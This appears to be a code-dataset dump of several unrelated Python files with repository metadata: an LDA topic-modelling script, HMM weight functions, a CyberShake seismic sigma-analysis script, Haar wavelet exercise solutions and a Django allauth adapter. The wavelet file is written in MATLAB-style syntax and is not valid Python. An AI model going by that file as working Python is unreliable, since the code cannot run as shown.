# f.write(t+'\n')
# f.close()
def getLdaMatrix():
print('1.初始化停止词列表 ------')
# 开始的时间
t_start = time.time()
# 加载停用词表
stop_words = load_stopword()
print('2.开始读入语料数据 ------ ')
# 读入语料库
# create_corpusTXT()
# f = open('E:/Code/ELMo_CNN/LdaCorpus.txt','r')
# 语料库分词并去停用词
texts = create_corpusList()
texts = [[word for word in OneText.strip().lower().split() if word not in stop_words] for OneText in texts]
print('读入语料数据完成,用时%.3f秒' % (time.time() - t_start))
# f.close()
M = len(texts)
print('文本数目:%d个' % M)
print('3.正在建立词典 ------')
# 建立字典
dictionary = corpora.Dictionary(texts)
V = len(dictionary)
print('4.正在计算文本向量 ------')
# 转换文本数据为索引,并计数
corpus = [dictionary.doc2bow(text) for text in texts]
print('5.正在计算文档TF-IDF ------')
t_start = time.time()
# 计算tf-idf值
corpus_tfidf = models.TfidfModel(corpus)[corpus]
print('建立文档TF-IDF完成,用时%.3f秒' % (time.time() - t_start))
print('6.LDA模型拟合推断 ------')
# 训练模型
num_topics = 20
t_start = time.time()
lda = models.LdaModel(corpus_tfidf, num_topics=num_topics, id2word=dictionary,
alpha=0.01, eta=0.01, minimum_probability=0.001,
update_every=1, chunksize=100, passes=1)
print('LDA模型完成,训练时间为\t%.3f秒' % (time.time() - t_start))
# matrix(1772, 20) 打印1772个文档的20个主题
topic_text_matrix = []
print('7.结果:1772个文档的主题分布:--')
doc_topics = lda.get_document_topics(corpus_tfidf)
idx = np.arange(M)
for i in idx:
topic = np.array(doc_topics[i])
topic_distribute = np.array(topic[0:20,1])
topic_idx = topic_distribute.argsort()[:-num_topics-1:-1]
topic_text_matrix.append(topic_distribute[topic_idx])
return topic_text_matrix
if __name__ == '__main__':
# topic_matrix= getLdaMatrix()
# np.save('topic_matrix.npy',topic_matrix)
m = np.load('topic_matrix.npy',allow_pickle=True)
# print(m)
# path = 'E:/Code/ELMo_CNN/lda.mat'
# scio.savemat(path, {'text':topic_matrix})
# print(topic_matrix[:5])
# 随机打印某10个文档的主题
# num_show_topic = 10 # 每个文档显示前几个主题
# print('7.结果:10个文档的主题分布:--')
# doc_topics = lda.get_document_topics(corpus_tfidf) # 所有文档的主题分布
# idx = np.arange(M)
# np.random.shuffle(idx)
# idx = idx[:10]
# for i in idx:
# topic = np.array(doc_topics[i])
# topic_distribute = np.array(topic[:, 1])
# # print topic_distribute
# topic_idx = topic_distribute.argsort()[:-num_show_topic - 1:-1]
# print('第%d个文档的前%d个主题:' % (i, num_show_topic)), topic_idx
# print(topic_distribute[topic_idx])
# #
# num_show_term = 10 # 每个主题显示几个词
# print('8.结果:每个主题的词分布:--')
# for topic_id in range(num_topics):
# print('主题#%d:\t' % topic_id)
# term_distribute_all = lda.get_topic_terms(topicid=topic_id)
# term_distribute = term_distribute_all[:num_show_term]
# term_distribute = np.array(term_distribute)
# term_id = term_distribute[:, 0].astype(np.int)
# print('词:\t', )
# for t in term_id:
# print(dictionary.id2token[t], )
# print('\n概率:\t', term_distribute[:, 1])
| [
"799187444@qq.com"
] | 799187444@qq.com |
968853ef76eb93ba0488bd086ea3d7f43dfc93a3 | 4abc1688699b5301df091ac3bf2605e154906cb6 | /gtnlplib/hmm.py | 317b1a53ea1cdb453b23acffcf5179a9036a3e87 | [] | no_license | fengweijp/Sequence-Labeling | b0f6f0bd5d14ebb608837c29edc59236900f5331 | 9351b43b69dc8508437971c579919e08cdda7824 | refs/heads/master | 2023-03-18T03:36:05.685216 | 2018-10-08T16:36:33 | 2018-10-08T16:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,961 | py | from gtnlplib.preproc import conll_seq_generator
from gtnlplib.constants import START_TAG, END_TAG, OFFSET, UNK
from gtnlplib import naive_bayes, most_common
import numpy as np
from collections import defaultdict
import torch
import torch.nn
from torch.autograd import Variable
def compute_transition_weights(trans_counts, smoothing):
"""
Compute the HMM transition weights, given the counts.
Don't forget to assign smoothed probabilities to transitions which
do not appear in the counts.
This will also affect your computation of the denominator.
Don't forget to assign smoothed probabilities to transitions which do not appear in the counts.
Do not assign probabilities for transitions to the START_TAG, which can only come first. This will also affect your computation of the denominator, since you are not smoothing the probability of transitions to the START_TAG.
Don't forget to assign probabilities to transitions to the END_TAG; this too will affect your denominator.
As always, probabilities should sum to one (this time conditioned on the previous tag)
:param trans_counts: counts, generated from most_common.get_tag_trans_counts
:param smoothing: additive smoothing
:returns: dict of features [(curr_tag,prev_tag)] and weights
"""
weights = defaultdict(float)
total_count = {}
for tag in trans_counts.keys():
total_count[tag] = sum(trans_counts[tag].values())
for prev_tag in trans_counts:
for curr_tag in (list(trans_counts.keys()) + [END_TAG]):
if curr_tag in trans_counts[prev_tag]:
weights[(curr_tag, prev_tag)] = np.log((trans_counts[prev_tag][curr_tag] + smoothing) / (total_count[prev_tag] + len(trans_counts) * smoothing))
else:
weights[(curr_tag, prev_tag)] = np.log(smoothing / (total_count[prev_tag] + len(trans_counts) * smoothing))
for tag in (list(trans_counts.keys()) + [END_TAG]):
weights[START_TAG, tag] = -np.inf
weights[tag, END_TAG] = -np.inf
return weights
def compute_weights_variables(nb_weights, hmm_trans_weights, vocab, word_to_ix, tag_to_ix):
"""
Computes autograd Variables of two weights: emission_probabilities and the tag_transition_probabilties
parameters:
nb_weights: -- a dictionary of emission weights
hmm_trans_weights: -- dictionary of tag transition weights
vocab: -- list of all the words
word_to_ix: -- a dictionary that maps each word in the vocab to a unique index
tag_to_ix: -- a dictionary that maps each tag (including the START_TAG and the END_TAG) to a unique index.
:returns:
emission_probs_vr: torch Variable of a matrix of size Vocab x Tagset_size
tag_transition_probs_vr: torch Variable of a matrix of size Tagset_size x Tagset_size
:rtype: autograd Variables of the the weights
"""
# Assume that tag_to_ix includes both START_TAG and END_TAG
tag_transition_probs = np.full((len(tag_to_ix), len(tag_to_ix)), -np.inf)
emission_probs = np.full((len(vocab),len(tag_to_ix)), -np.inf)
for word in word_to_ix.keys():
for tag in tag_to_ix.keys():
if (tag, word) in nb_weights and word != OFFSET:
weight = nb_weights[tag, word]
emission_probs[word_to_ix[word], tag_to_ix[tag]] = weight
elif tag != START_TAG and tag != END_TAG:
emission_probs[word_to_ix[word], tag_to_ix[tag]] = 0
for tag, prev_tag in hmm_trans_weights:
if prev_tag != END_TAG or tag != START_TAG:
weight = hmm_trans_weights[tag, prev_tag]
tag_transition_probs[tag_to_ix[tag], tag_to_ix[prev_tag]] = weight
emission_probs_vr = Variable(torch.from_numpy(emission_probs.astype(np.float32)))
tag_transition_probs_vr = Variable(torch.from_numpy(tag_transition_probs.astype(np.float32)))
return emission_probs_vr, tag_transition_probs_vr
| [
"neilbarooah@Neils-MacBook-Pro-2.local"
] | neilbarooah@Neils-MacBook-Pro-2.local |
e6295ff4215ade162c48627668c49a52c02d301e | ba96b32c20ef78588f348c55c8e0dd2b1a8c9805 | /scripts/ModelAssemble/CalculateSigma.py | 44a018ce52df4000a85c3e297ef8875fade94a09 | [] | no_license | fengw/ABFanalysis | aa63ce70f20188c2876702072dc775b4585f7c92 | b00c61dc5f5a4055e5fce1b23dce3821257d845d | refs/heads/master | 2021-01-09T21:47:35.667108 | 2017-09-06T01:40:38 | 2017-09-06T01:40:38 | 47,899,500 | 0 | 0 | null | 2016-09-27T16:00:51 | 2015-12-13T00:00:36 | Shell | UTF-8 | Python | false | false | 16,115 | py | #!/usr/bin/env python
import os, sys
import optparse
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
import time
from pyABF import *
from pynga import *
from my_util.numer import interp
tic = time.time()
# Check if we need to do the interpolation (maybe just save the uninterpolated one and let GMT do the interpolation)
# Basic parameters
parser = optparse.OptionParser()
parser.add_option('-m','--model-flag', dest='mflag', type='string', help='model selection')
parser.add_option('-r','--rupture-model-id', dest='rup_model_id', type='int', nargs=4, help='rupture model specfication')
parser.add_option('-p','--period', dest='T', type='float', help='period')
parser.add_option('-S','--sigma', dest='sigma', type='string', help='parameters controling the hypocenter distribution')
parser.add_option('-G','--Gflag', dest='Gflag', type='int', help='parameters controling the absolute or residual')
#parser.add_option('-s','--source-id', dest='sid', type='int', help='SourceID' )
# example: CalculateSigma.py -m 54 -r 35 8 4 5 -p 3.00 -S 1.00_1.00 -G 0
# CyberShake Dictionary
CSdict = {'(35,5,3,1)':'CS11',
'(35,7,4,1)':'CS13.1',
'(35,7,4,4)':'CS13.2',
'(35,8,4,8)':'CSbbp1D',
'(35,8,4,5)':'CS14S4.26',
'(35,6,4,7)':'CS14.2CVMH',
'(36,8,6,5)':'CS15.4',
}
# use in check inputs
parser.print_help()
(options, args) = parser.parse_args()
sigmaMap = True # do the interpolation
mflag = options.mflag
rup_model_id = options.rup_model_id
erf_id, sgt_id, rvid, vel_id = rup_model_id
T = '%3.2f'%options.T
sigma = '%s'%options.sigma
Gflag = options.Gflag
#sid = options.sid
CSmodel = CSdict['(%s,%s,%s,%s)'%(erf_id,sgt_id,rvid,vel_id)]
if CSmodel in ['CS14S4.26', 'CS14.3CVMH', 'CS15.4', ]:
ABFstr = 'ABFanalysis'
ngaModel = '14'
else:
ABFstr = 'CyberShake_analysis'
ngaModel = '08'
wrk = '/Users/fengw/work/Project/%s'%ABFstr
# Inputs
mapin = '/Users/fengw/work/Project/%s/scripts/map_input/'%ABFstr
Gpth0 = mapin + 'Model_Rups%s/ERF%s_SGT%s_RupVar%s_Vel%s/Gkxmfs0/'%(mflag, erf_id, sgt_id, rvid, vel_id)
Epth = Gpth0 + 'Ekxms/Sigma%s'%(sigma)
Gpth = mapin + 'Model_Rups%s/ERF%s_SGT%s_RupVar%s_Vel%s/Gkxmfs/'%(mflag, erf_id, sgt_id, rvid, vel_id)
Fpth = Gpth + 'SFks/Sigma%s'%(sigma) # only for CyberShake (column 3)
Dpth = Gpth + 'Dkxs/Sigma%s'%(sigma)
Cpth = Gpth + 'Cks/Sigma%s'%(sigma)
Bpth = Gpth + 'Bs/Sigma%s'%(sigma)
mapout0 = '/Users/fengw/work/Project/%s/scripts/map_input/'%ABFstr
mapout1 = mapout0 + 'Model_Rups%s'%mflag
mapout2 = mapout1 + '/ERF%s_SGT%s_RupVar%s_Vel%s'%(erf_id,sgt_id,rvid,vel_id )
mapout3 = mapout2 + '/Gkxmfs'
for f in [mapout0, mapout1, mapout2, mapout3,]:
if not os.path.exists( f ):
os.mkdir(f)
# interpolation parameters
eps = 0.001
smooth = 0.01
method = {'name':'exp','smooth':smooth}
site_locs1 = './SiteInterpMesh.txt'
sites = np.loadtxt( site_locs1 )
SiteLon1D = sites[:,0]
SiteLat1D = sites[:,1]
# read in source info
srcfile = Gpth0 + 'SourceInfo'
srids = np.loadtxt( srcfile )
sids = srids[:,0]
Areas = srids[:,1]
# read in hypocenter info
hypofile = Gpth0 + 'SourceRuptureHypoInfo'
inputs = np.loadtxt( hypofile )
sidhypo = {}
for i in xrange( inputs.shape[0] ):
sidhypo[str(int(inputs[i,0]))] = inputs[i,2] # number of hypocenters
# source weighting function
if mflag[0] == '5':
# Test same disaggregation condition, but different Ntop (number of sources used)
IML = '0.3_G' # consider rock sites or choose large IML value
Str0 = 'DisaggSources_ERF%s_'%(35)
Str1 = 'DisaggIML_' + IML
Str2 = '_SA_3sec.txt'
Ntops = [5,10,15,20,25,30]
if mflag[1] in ['1','2','3','4','5','6']:
Ntop = Ntops[int(mflag[1])-1]
DisaggSourceFile = wrk + '/metadata/Disaggregation/DisaggSources/UniformSiteDistribution/' + Str0 + Str1 + Str2
sids, srcPDF = Disaggregation.GetSourceIDs(DisaggSourceFile,Ntop=Ntop)
# sigma values output path
CSmodel = CSdict['(%s,%s,%s,%s)'%(erf_id,sgt_id,rvid,vel_id)]
print 'CyberShake Model:', CSmodel
erf_id, sgt_id, rvid, vel_id = rup_model_id
soutpth = '/Users/fengw/work/Project/ABFanalysis/scripts/ModelAssemble/inputs/ABFvariances_NGA%s/%s'%(ngaModel, CSmodel)
if not os.path.exists(soutpth):
os.mkdir(soutpth)
if Gflag:
soutfile = soutpth + '/absolute_T%s.csv'%T
print 'Absolute sigmas'
else:
soutfile = soutpth + '/residual_T%s.csv'%T
print 'Residual sigmas'
# Sigma_T after SC08 correction
NGAmodel = ['CB','BA','CY','AS']
sigmaT = []
for nga in NGAmodel:
SC08 = SC08_model( nga + '08' )
ind = (np.array(SC08.periods) == float(T)).nonzero()[0]
tau = SC08.tau[ind]
sigma0 = SC08.sigma0[ind]
sigmaT0 = np.sqrt( tau**2 + sigma0**2 )
#print nga, sigma0**2, tau**2, sigmaT**2
print nga, sigma0, tau, sigmaT0
sigmaT.append( sigmaT0**2 ) # variance unit
# ===================
# Sigma_F
# ===================
print 'Compute sigma_U...'
sigma_F_ks = []
for isid in xrange( len(sids) ):
sid = str(int(sids[isid]))
AreaTmp = Areas[isid]
Nh = int(sidhypo[sid])
# read in Magnitude info for given sid
Ffile = Fpth + '/' + sid + '/CyberShake.NGAs.%s.Source%s.Sfks'%(T,sid)
inputs = np.loadtxt( Ffile )
lons0 = inputs[:,0]
lats0 = inputs[:,1]
sigma_F_ks.append( inputs[:,2] ) # only CyberShake has sigma_F^2 (careful here)
sigma_F_ks = np.array(sigma_F_ks) # dimension: [Nsid, Nsta,Nmodels], type: variance
# compute the average of CyberShake
pdf_s = np.repeat( 1./sigma_F_ks.shape[1], sigma_F_ks.shape[1] )
sigma_F_CS = np.average( np.average( sigma_F_ks, axis=0, weights = srcPDF ), axis=0, weights = pdf_s )
print 'sigma_F', mflag, T, rup_model_id, np.sqrt( sigma_F_CS ) # attention: printed are all sigmas and what are written in table is sigma as well
sigmaT.append(sigma_F_CS)
sigmaT.append(0) # for reference model
sigma_F = np.array(sigmaT)
print sigma_F.shape
# ===================
# Ekxms for sigma_M
# ===================
print 'Compute sigma_M...'
mapout4 = mapout3 + '/SEks'
mapout = mapout4 + '/Sigma%s'%(sigma)
for f in [mapout4, mapout, ]:
if not os.path.exists( f ):
os.mkdir(f)
sigma_M_ks = []
for isid in xrange( len(sids) ):
sid = str(int(sids[isid]))
AreaTmp = Areas[isid]
Nh = int(sidhypo[sid])
# Calculate the hypocenter weighting function (pdf_x)
xh = (np.arange( Nh )+1.0) / (Nh+1.0)
spl = sigma.strip().split('_')
alpha, beta = float(spl[0]), float(spl[1])
prob0 = stats.beta.pdf(xh,alpha,beta) # use scipy.stats
pdf_x = (prob0/sum(prob0)).tolist() # to make sure sum(prob) = 1
# read in Magnitude info for given sid
#Mfile = Epth + '/' + sid + '/SourceRuptureMwInfo'
#Mws = np.loadtxt( Mfile )
tmp_Mws = glob.glob( Epth+'/'+sid +'/M*' )
Mws = []
for tmp_Mw in tmp_Mws:
spl = tmp_Mw.strip().split('/')[-1]
Mws.append( float( spl[1:] ) )
mu = 3.87 + np.log10(AreaTmp) * 1.05 # somerville 2006 M-A relationship
std = 0.2
prob0 = 1./(np.sqrt(2.*np.pi)*std) * np.exp(-0.5*((Mws-mu)/std)**2)
pdf_m = (prob0 / sum(prob0)).tolist() # weighting should be summed up to 1
tmp_ekxms = []
for ihypo in xrange( Nh ):
tmp1 = []
for Mw in Mws:
Mw0 = str(Mw)
Efile = Epth + '/'+sid+'/'+'M%.2f'%Mw +'/' +'Period%s.Hypo%s.ekxms'%(T,ihypo)
inputs = np.loadtxt( Efile )
lons0 = inputs[:,0]
lats0 = inputs[:,1]
e1 = inputs[:,2:8] # CS-CB, CS-BA, CS-CY, CS-AS, CS, CS-Ref
if Gflag:
# absolute
ekxms0 = np.zeros( e1.shape )
ekxms0 = -( e1[:,:6]-e1[:,4:5] ) # NGA and Ref
ekxms0[:,4:5] = e1[:,4:5] # CS
else:
ekxms0 = e1
tmp1.append( ekxms0 )
tmp_ekxms.append( tmp1 )
tmp_ekxms = np.array( tmp_ekxms ) # [Nhypo, NMw, Nsta, Nmodels]
# standard deviation and average over hypocenters
tmp_sd_xs = np.sqrt( np.average( tmp_ekxms**2, axis=1,weights=pdf_m) )
tmp_sd0 = np.average( tmp_sd_xs, axis=0, weights = pdf_x )
tmp_vd0 = np.average( tmp_sd_xs**2, axis=0, weights = pdf_x )
if sigmaMap:
tmp_sd = []; tmp_vd = []
for imodel in xrange( tmp_sd0.shape[1] ):
NewValue = interp( lons0, lats0, tmp_sd0[:,imodel], SiteLon1D, SiteLat1D, eps=eps, method=method )
tmp_sd.append( NewValue )
NewValue = interp( lons0, lats0, tmp_vd0[:,imodel], SiteLon1D, SiteLat1D, eps=eps, method=method )
tmp_vd.append( NewValue )
sigma_M_ks.append( tmp_vd ) # variance unit
pafile = mapout + '/CyberShake.NGAs.%s.Source%s.Seks'%(T,sid)
fid = open( pafile, 'w' )
Nrow = len(SiteLon1D)
for irow in xrange( Nrow ):
fid.write( '%s %s %s %s %s %s %s %s\n'%(SiteLon1D[irow],SiteLat1D[irow], \
tmp_sd[0][irow],
tmp_sd[1][irow],
tmp_sd[2][irow],
tmp_sd[3][irow],
tmp_sd[4][irow],
tmp_sd[5][irow] ))
fid.close()
else:
sigma_M_ks.append(tmp_vd0)
sigma_M_ks = np.array(sigma_M_ks) # dimension: [Nsid, Nmodel, Nsta ]
# compute the average
pdf_s = np.repeat( 1./sigma_M_ks.shape[2], sigma_M_ks.shape[2] )
sigma_M = np.average( np.average( sigma_M_ks, axis=0, weights = srcPDF ), axis=1, weights = pdf_s )
#print 'sigma_M', mflag, T, rup_model_id, np.sqrt( sigma_M )
# ===================
# Dkxs for sigma_D
# ===================
print 'Compute sigma_D...'
mapout4 = mapout3 + '/SDksD' # distinguish with SDks (residual sigma)
mapout = mapout4 + '/Sigma%s'%(sigma)
for f in [mapout4, mapout, ]:
if not os.path.exists( f ):
os.mkdir(f)
sigma_D_ks = []
for isid in xrange( len(sids) ):
sid = str(int(sids[isid]))
AreaTmp = Areas[isid]
Nh = int(sidhypo[sid])
# Calculate the hypocenter weighting function (pdf_x)
xh = (np.arange( Nh )+1.0) / (Nh+1.0)
spl = sigma.strip().split('_')
alpha, beta = float(spl[0]), float(spl[1])
prob0 = stats.beta.pdf(xh,alpha,beta) # use scipy.stats
pdf_x = (prob0/sum(prob0)).tolist() # to make sure sum(prob) = 1
tmp_dkxs = []
for ihypo in xrange( Nh ):
Dfile = Dpth + '/'+sid+'/'+'CyberShake.NGAs.%s.Source%s.Ih%s.dkxs'%(T,sid,ihypo)
inputs = np.loadtxt( Dfile )
lons0 = inputs[:,0]
lats0 = inputs[:,1]
d1 = inputs[:,4:10] # CS-CB, CS-BA, CS-CY, CS-AS, CS, CS-Ref
if Gflag:
dkxs0 = np.zeros( d1.shape )
dkxs0 = -( d1[:,:6]-d1[:,4:5] ) # NGA and Ref
dkxs0[:,4:5] = d1[:,4:5] # CS
else:
dkxs0 = d1
tmp_dkxs.append( dkxs0 )
tmp_dkxs = np.array( tmp_dkxs )
# standard deviation and average over hypocenters
tmp_sd = np.sqrt( np.average( tmp_dkxs**2, axis=0,weights=pdf_x) )
sigma_D_ks.append( tmp_sd**2 ) # variance
if sigmaMap:
pafile = mapout + '/CyberShake.NGAs.%s.Source%s.SdksD'%(T,sid)
fid = open( pafile, 'w' )
Nrow = len(SiteLon1D)
for irow in xrange( Nrow ):
fid.write( '%s %s %s %s %s %s %s %s\n'%(SiteLon1D[irow],SiteLat1D[irow], \
tmp_sd[irow, 0],
tmp_sd[irow, 1],
tmp_sd[irow, 2],
tmp_sd[irow, 3],
tmp_sd[irow, 4],
tmp_sd[irow, 5],
))
fid.close()
# compute average
sigma_D_ks = np.array(sigma_D_ks)
pdf_s = np.repeat( 1./sigma_D_ks.shape[1], sigma_D_ks.shape[1] )
sigma_D = np.average( np.average( sigma_D_ks, axis=0, weights = srcPDF ), axis=0, weights = pdf_s )
print 'sigma_D', mflag, T, rup_model_id, np.sqrt( sigma_D )
# ==================
# Sigma_C
# ==================
print 'Compute Sigma_C...'
mapout4 = mapout3 + '/SCs' # distinguish with SDks (residual sigma)
mapout = mapout4 + '/Sigma%s'%(sigma)
for f in [mapout4, mapout, ]:
if not os.path.exists( f ):
os.mkdir(f)
tmp_ks = []
for isid in xrange( len(sids) ):
sid = str(int(sids[isid]))
AreaTmp = Areas[isid]
Nh = int(sidhypo[sid])
Cfile = Cpth + '/CyberShake.NGAs.%s.Source%s.cks'%(T,sid)
inputs = np.loadtxt( Cfile )
lons0 = inputs[:,0]
lats0 = inputs[:,1]
c1 = inputs[:,5:11] # CS-CB, CS-BA, CS-CY, CS-AS, CS, CS-Ref
if Gflag:
cks0 = np.zeros( c1.shape )
cks0 = -( c1[:,:6]-c1[:,4:5] ) # NGA and Ref
cks0[:,4:5] = c1[:,4:5] # CS
else:
cks0 = c1
tmp_ks.append( cks0 )
tmp_ks = np.array( tmp_ks )
# standard deviation and average over hypocenters
tmp_sd = np.sqrt( np.average( tmp_ks**2, axis=0, weights=srcPDF) )
sigma_C_s = tmp_sd**2 # variance
if sigmaMap:
pafile = mapout + '/CyberShake.NGAs.%s.SCs'%T
fid = open( pafile, 'w' )
Nrow = len(SiteLon1D)
for irow in xrange( Nrow ):
fid.write( '%s %s %s %s %s %s %s %s\n'%(SiteLon1D[irow],SiteLat1D[irow], \
tmp_sd[irow, 0],
tmp_sd[irow, 1],
tmp_sd[irow, 2],
tmp_sd[irow, 3],
tmp_sd[irow, 4],
tmp_sd[irow, 5],
))
fid.close()
# compute average
pdf_s = np.repeat( 1./sigma_C_s.shape[0], sigma_C_s.shape[0] )
sigma_C = np.average( sigma_C_s, axis=0, weights = pdf_s )
print 'sigma_C', mflag, T, rup_model_id, np.sqrt( sigma_C )
# ==================
# Sigma_B
# ==================
print 'Compute Sigma_B...'
mapout4 = mapout3 + '/SB' # distinguish with SDks (residual sigma)
mapout = mapout4 + '/Sigma%s'%(sigma)
for f in [mapout4, mapout, ]:
if not os.path.exists( f ):
os.mkdir(f)
Bfile = Bpth + '/'+'CyberShake.NGAs.%s.bs'%(T)
inputs = np.loadtxt( Bfile )
lons0 = inputs[:,0]
lats0 = inputs[:,1]
b1 = inputs[:,5:11] # CS-CB, CS-BA, CS-CY, CS-AS, CS, CS-Ref
if Gflag:
bs0 = np.zeros( b1.shape )
bs0 = -( b1[:,:6]-b1[:,4:5] ) # NGA and Ref
bs0[:,4:5] = b1[:,4:5] # CS
else:
bs0 = b1
# standard deviation and average over hypocenters
pdf_s = list(np.repeat(1./bs0.shape[0],bs0.shape[0]))
tmp_sd = np.sqrt( np.average( bs0**2, axis=0, weights=pdf_s ) )
sigma_B = tmp_sd**2
if sigmaMap:
pafile = mapout + '/CyberShake.NGAs.%s.SbsB'%(T)
fid = open( pafile, 'w' )
fid.write( '%s %s %s %s %s %s\n'%( \
tmp_sd[0],
tmp_sd[1],
tmp_sd[2],
tmp_sd[3],
tmp_sd[4],
tmp_sd[5],
))
fid.close()
print 'sigma_B', mflag, T, rup_model_id, np.sqrt( sigma_B )
# write sigmas into file (not varirance, but above are all variance)
sfid = open(soutfile,'w')
if Gflag:
print 'sigma_T(abf)', mflag, T, rup_model_id, np.sqrt( sigma_B+sigma_C+sigma_D+sigma_M+np.array([sigmaT[0], sigmaT[1], sigmaT[2],sigmaT[3],sigmaT[4],sigmaT[5]]))
sigma_G = sigma_B+sigma_C+sigma_D+sigma_M+np.array([sigmaT[0], sigmaT[1], sigmaT[2],sigmaT[3],sigmaT[4],sigmaT[5]])
sfid.write('Model, sigma_B, sigma_C, sigma_D, sigma_M, sigma_F, sigma_G\n')
Var_ABF = np.array([sigma_B, sigma_C, sigma_D, sigma_M, sigma_F, sigma_G]) # each has size (6, but we want 0:5)
else:
print 'sigma_T(abf)', mflag, T, rup_model_id, np.sqrt( sigma_B+sigma_C+sigma_D+sigma_M+np.array([sigma_F_CS,sigma_F_CS,sigma_F_CS,sigma_F_CS, 0, sigma_F_CS]) )
sigma_f = np.array([sigma_F_CS,sigma_F_CS,sigma_F_CS,sigma_F_CS, 0, sigma_F_CS]) # NGA has no contribution to residual f variance!!!
sigma_G = sigma_B+sigma_C+sigma_D+sigma_M+sigma_f
sfid.write('Model, sigma_b, sigma_c, sigma_d, sigma_m, sigma_f, sigma_g\n')
Var_ABF = np.array([sigma_B, sigma_C, sigma_D, sigma_M, sigma_f, sigma_G]) # each has size (6, but we want 0:5)
nrow, ncol = Var_ABF.shape
# compute NGArms [3,1,2,0]
NGA_rms = []
for irow in range(nrow):
sigma_tmp = Var_ABF[irow,:4] # NGAs
NGA_rms.append(np.sqrt(sum(sigma_tmp)/len(sigma_tmp))) # root mean square
sigma_ABF = np.sqrt(Var_ABF)
for icol in [3,1,0,2]:
sfid.write('%s,%s,%s,%s,%s,%s,%s\n'%(NGAmodel[icol],sigma_ABF[0,icol],sigma_ABF[1,icol],sigma_ABF[2,icol], sigma_ABF[3,icol], sigma_ABF[4,icol], sigma_ABF[5,icol]))
# write out the NGA-rms (for Gflag = 0, this is CS-NGArms)
sfid.write('NGA-rms, %s, %s, %s, %s, %s, %s\n'%(NGA_rms[0],NGA_rms[1],NGA_rms[2],NGA_rms[3],NGA_rms[4],NGA_rms[5]))
# write out CyberShake
icol = 4
sfid.write('%s, %s,%s,%s,%s,%s,%s\n'%(CSmodel, sigma_ABF[0,icol],sigma_ABF[1,icol],sigma_ABF[2,icol], sigma_ABF[3,icol], sigma_ABF[4,icol], sigma_ABF[5,icol]))
sfid.close()
print 'time elapsed: %s'%(time.time()-tic)
| [
"fengo.win@gmail.com"
] | fengo.win@gmail.com |
dd1953d6927d29066068ea81328364dee75a86e6 | bbf1ae079309eca11270422d3f0d259d1515d430 | /numerical-tours/python/todo/solutions/wavelet_2_haar2d.py | 7ec8c89d23ba2108e274a13521844d6ad479f593 | [
"BSD-2-Clause"
] | permissive | ZichaoDi/Di_MATLABTool | 5e6a67b613c4bcf4d904ddc47c2744b4bcea4885 | c071291c63685c236f507b2cb893c0316ab6415c | refs/heads/master | 2021-08-11T07:28:34.286526 | 2021-08-04T18:26:46 | 2021-08-04T18:26:46 | 149,222,333 | 9 | 5 | null | null | null | null | UTF-8 | Python | false | false | 2,522 | py | def exo1():
"""
Implement a full wavelet transform that extract iteratively wavelet
coefficients, by repeating these steps. Take care of choosing the
correct number of steps.
"""
Jmin = 0
fw = f
for j in J: -1: Jmin:
fw(1: 2^(j + 1), 1: 2^(j + 1)) = haar(fw(1: 2^(j + 1), 1: 2^(j + 1)))
%
j1 = J-j
if j1 <4
A = fw(1: 2^(j + 1), 1: 2^(j + 1))
imageplot(A(1: 2^j, 2^j + 1: 2^(j + 1)), ['Horizontal, j = ' num2str(j)], 3, 4, j1 + 1)
imageplot(A(2^j + 1: 2^(j + 1), 1: 2^j), ['Vertical, j = ' num2str(j)], 3, 4, j1 + 5)
imageplot(A(2^j + 1: 2^(j + 1), 2^j + 1: 2^(j + 1)), ['Diagonal, j = ' num2str(j)], 3, 4, j1 + 9)
def exo2():
"""
Write the inverse wavelet transform that computes $f_1$ from
coefficients |fW|.
"""
f1 = fw
for j in Jmin: J:
s = 1: 2^j; t = 2^j + 1: 2^(j + 1); u = 1: 2^(j + 1)
f1(u, u) = ihaar(f1(s, s), f1(s, t), f1(t, s), f1(t, t))
%
j1 = J-j
if j1 >0 & j1 <5
A = f1(1: 2^(j + 1), 1: 2^(j + 1))
subplot(2, 2, j1)
imageplot(A, ['Partial reconstruction, j = ' num2str(j)])
def exo3():
"""
Display the reconstructed signal obtained from |fw1|, for a decreasing cut-off scale $j$.
"""
jlist = J-(1: 4)
fw = perform_haar_transf(f, 1, + 1)
for i in 1: length(jlist):
j = jlist(i)
fw1 = zeros(n); fw1(1: 2^j, 1: 2^j) = fw(1: 2^j, 1: 2^j)
f1 = perform_haar_transf(fw1, 1, -1)
% display
subplot(2, 2, i)
imageplot(f1)
title(strcat(['j = ' num2str(j) ', SNR = ' num2str(snr(f, f1), 3) 'dB']))
def exo4():
"""
Find the threshold $T$ so that the number of remaining coefficients in
|fwT| is a fixed number $m$. Use this threshold to compute |fwT| and then display
the corresponding approximation $f_1$ of $f$. Try for an increasing number $m$ of coeffiients.
"""
m_list = round([.005 .01 .05 .1]*N); % number of kept coefficients
fw = perform_haar_transf(f, 1, + 1)
for i in 1: length(m_list):
m = m_list(i)
% select threshold
v = sort(abs(fw(: )))
if v(1) <v(N)
v = reverse(v)
T = v(m)
fwT = fw .* (abs(fw) >= T)
% inverse
f1 = perform_haar_transf(fwT, 1, -1)
% display
subplot(2, 2, i)
imageplot(f1)
title(strcat(['m = ' num2str(m) ', SNR = ' num2str(snr(f, f1), 3) 'dB']))
| [
"wendydi@compute001.mcs.anl.gov"
] | wendydi@compute001.mcs.anl.gov |
49598af4f83adbd580e591b0ad4dfa516b153a77 | 9a7d296bf9350e7ce437b87673753ebbeaee0078 | /server/mors_seo/adapters.py | fb127dc4dd0cb3897b1b1e50cc9e69b1b57fb743 | [] | no_license | wahello/mors | 52e0a2c31db9636066dfb0a6af5cc38712d68c96 | bf0c45364b21e8832c475d464364de3d20ada6a4 | refs/heads/master | 2020-04-28T16:20:37.653870 | 2019-02-02T12:29:00 | 2019-02-02T12:29:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 979 | py | from allauth.account.adapter import DefaultAccountAdapter
from allauth.account.utils import user_email, user_username, user_field
class UserAdapter(DefaultAccountAdapter):
def save_user(self, request, user, form, commit=True):
"""Saves a new `User` instance using information provided in the signup form."""
data = form.cleaned_data
first_name = data.get('first_name')
last_name = data.get('last_name')
user_email(user, data.get('email'))
user_username(user, data.get('username'))
user_field(user, 'seo_result', [])
if first_name:
user_field(user, 'first_name', first_name)
if last_name:
user_field(user, 'last_name', last_name)
if 'password1' in data:
user.set_password(data["password1"])
else:
user.set_unusable_password()
self.populate_username(request, user)
if commit:
user.save()
return user
| [
"wos.mateusz16@gmail.com"
